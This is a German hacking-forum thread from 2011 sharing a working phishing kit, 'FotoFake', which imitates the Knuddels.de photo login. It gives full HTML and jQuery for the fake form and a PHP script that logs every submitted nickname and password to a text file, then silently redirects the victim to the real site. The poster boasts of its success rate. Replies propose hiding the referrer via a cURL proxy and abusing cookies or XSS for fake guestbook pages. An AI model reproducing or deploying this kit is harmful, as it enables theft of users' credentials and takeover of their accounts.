[PHP-Source] Foto-Fake extreme by svN

**svN** · 16.10.2011, 23:01

Hallo liebe Community,

ich werde jetzt mein legendäres Script „FotoFake“ der Community überlassen,
was ihr damit macht, bleibt euch überlassen.

Download ist: Online

Erklärung:

Programmiertes:

PHP, HTML, CSS, jQuery.
Funktionalität: 100%
Erfolgsquote: ca. 60% - 70%

Ihr könnt das Script auch gerne umschreiben, oder als was anderes benutzen z.B: Andere Fake-Seiten.

Das gute an dem Script ist, dass wenn die Richtigen „Knuddels.de“ Daten eingetragen werden, loggt er sich direkt auf der Photo-Seite von „Knuddels.de“ ein, dass heißt ganz klar, dass wenn auch die Falschen „Knuddels.de“ Daten angegeben werden, kommt sofort die Fehlermeldung: „Falsches Passwort / Nickname existiert nicht".
Dank jQuery, werden alle Informationen aus der Form „#ID“ gesammelt und an die Gewünschte Adresse übergeben mittels POST.

Davon bekommt eurer „Victim“ nichts mit, wäre ja wohl scheiße, wenn er das alles sehen würde.

Index.html

Spoiler:

HTML-Code:

<script src="http://code.jquery.com/jquery-1.5.min.js"></script>
<script type="text/javascript">

$(document).ready(function()
{

    $("#form-photologin").submit(function() {
 

        $.ajax({
            type: "POST",
            url: "http://photo.knuddels.de/photos-login_submit.html",
            data: "?nickname" + $("#photologin-nickname").val() + "?password=" + $("#photologin-password").val(),
 
        });

        return true;
 
    });
 
});

</script>
<form action="lol.php" method="POST" accept-charset="UTF-8" enctype="application/x-www-form-urlencoded" id="form-photologin" name="form-photologin">
<table class="none">
<tbody>
<tr id="formline-photologin-nickname" class="formline formline-photologin-nickname formres-no formres-noresult-photologin-nickname ">
<td class="formlabel">
<span class="label">
<label for="photologin-nickname">Nickname</label>:</span></td>
<td class="formelement">
<div class="formelementbody">
<input type="text" class="text type-String" name="nickname" id="photologin-nickname" value="" />
<div class="formerror hidden" id="err-photologin-nickname"></div></div></td></tr>
<tr id="formline-photologin-password" class="formline formline-photologin-password formres-no formres-noresult-photologin-password ">
<td class="formlabel">
<span class="label">
<label for="photologin-password">Passwort</label>:</span></td>
<td class="formelement">
<div class="formelementbody">
<input type="password" class="text password type-String" name="password" id="photologin-password" />
<div class="formerror hidden" id="err-photologin-password"></div></div></td></tr></tbody></table>
<div class="bbutton submit" id="submit-button-1591813711">
<div class="bttl corner"></div>
<div class="bttr corner"></div>
<div class="bttm"></div>
<div class="btm">
<img src="http://1.1.1.1/bmi/photo.knuddels.de/sf/m/buttons/bt-nm.png" id="submit-button-791976364-img" class="jsFixHeight" style="" height="22" width="" />
<input type="submit" name="submitElement" value="" class="image-submit" />
<div class="btmi">
<span class="text">Login</span></div></div>
<div class="btbl corner"></div>
<div class="btbr corner"></div>
<div class="btbm"></div></div></form]

PHP Script:
lol.php

PHP-Code:


<?php
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
echo '<meta http-equiv="refresh" content="0;URL=http://photo.knuddels.de/photos-login_submit.html?nickname='.$_POST['nickname'].'&password='.$_POST['password'].'" />';
exit;  
?>

jQuery Script:

PHP-Code:



<script type="text/javascript">

$(document).ready(function()
{

    $("#form-photologin").submit(function() {
 

        $.ajax({
            type: "POST",
            url: "http://photo.knuddels.de/photos-login_submit.html",
            data: "?nickname" + $("#photologin-nickname").val() + "?password=" + $("#photologin-password").val(),
 
        });

        return true;
 
    });
 
});

</script>

Wichtig: Es muss noch die "log.txt" erstell werden, damit die Daten gespeichert werden können.

Info: Ihr dürft gerne Fragen stellen.

Ein kleines Dankeschön wäre angebracht.

Mit freundlichen Grüßen

svN alias j1nZ
__________________
-Push-
Ihr könnt auch gerne Fragen stellen. Oder ich würde euch sogar auch anbieten, euch zu Helfen...
__________________
-Push-

**Batzi** · 25.10.2011, 10:15

Wäre anders eleganter zu lösen.

Über jQuery würde ich die Daten an deiner PHP-File senden und über der PHP File (die als "Proxy") mittels cURL order fsockopen die Daten an Knuddels weiterleitet. So kann man auch sichergehen, dass der Referrer nicht erkennbar ist, da man diesen dann auf "Knuddels" setzen kann.

**muenchner91** · 27.10.2011, 22:16

Hi sry das ich sowas altes ausgrabe aber funktioniert das noch? und vor allem wie muss ich sowas einrichten finde das sehr elegant

**3lit** · 27.10.2011, 22:27

@muenchner91

Ja 11 tage sind natürlich sehr alt.
Sollte immer noch Funktionieren nach dieser langen zeit.

**muenchner91** · 27.10.2011, 22:34

@3LiT

sry habe nur das erste gesehen vom datum ausserdem wurde ich deswegen schon angemotzt^^

meine frage:

ist es möglich ein GB fake so einzurichten, dass wenn man auf GB in meinem nick klickt ein fake GB auftaucht bzw bei FOTO?

**3lit** · 27.10.2011, 22:36

@muenchner91

Nein, ist es nicht.
Sobald jemand eine XSS Lücke finden würde wäre das möglich.

**Batzi** · 28.10.2011, 01:35

Das mit dem GB gestaltet sich schwierig.
Haette aber eine Idee hier ueber JS zu arbeiten. Obs funzt weiss ich nicht, aber mal schauen.

Ich wuerde mir folgendes Vorstellen:
Ueber JS koennt man versuchen die gesetzten Cookies zu missbrauchen. Aber wenn ich gerade so ueberlege ists scheinbar unmoeglich da des GB unabhaengig zur Hp laeuft. Vielleicht koennte man hier tricksen und Javaschript im Backgroundimage zu setzen.

U-Labs

Account-Boerse

U-IMG

Thema: [PHP-Source] Foto-Fake extreme by svN